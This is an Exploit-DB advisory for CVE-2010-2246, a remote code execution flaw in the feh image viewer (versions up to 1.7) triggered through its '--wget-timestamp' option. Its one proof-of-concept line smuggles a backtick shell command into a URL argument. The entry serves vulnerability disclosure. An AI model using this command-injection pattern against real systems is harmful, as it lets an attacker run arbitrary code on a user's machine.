feh <= 1.7 - '--wget-timestamp' Remote Code Execution Vulnerability

2010-06-25T00:00:00
ID EDB-ID:34201
Type exploitdb
Reporter anonymous
Modified 2010-06-25T00:00:00

Description

feh 1.7 '--wget-timestamp' Remote Code Execution Vulnerability. CVE-2010-2246. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/41161/info

feh is prone to a remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. 

feh --wget-timestamp 'http://www.example.com/stuff/bar`touch lol_hax`.jpg'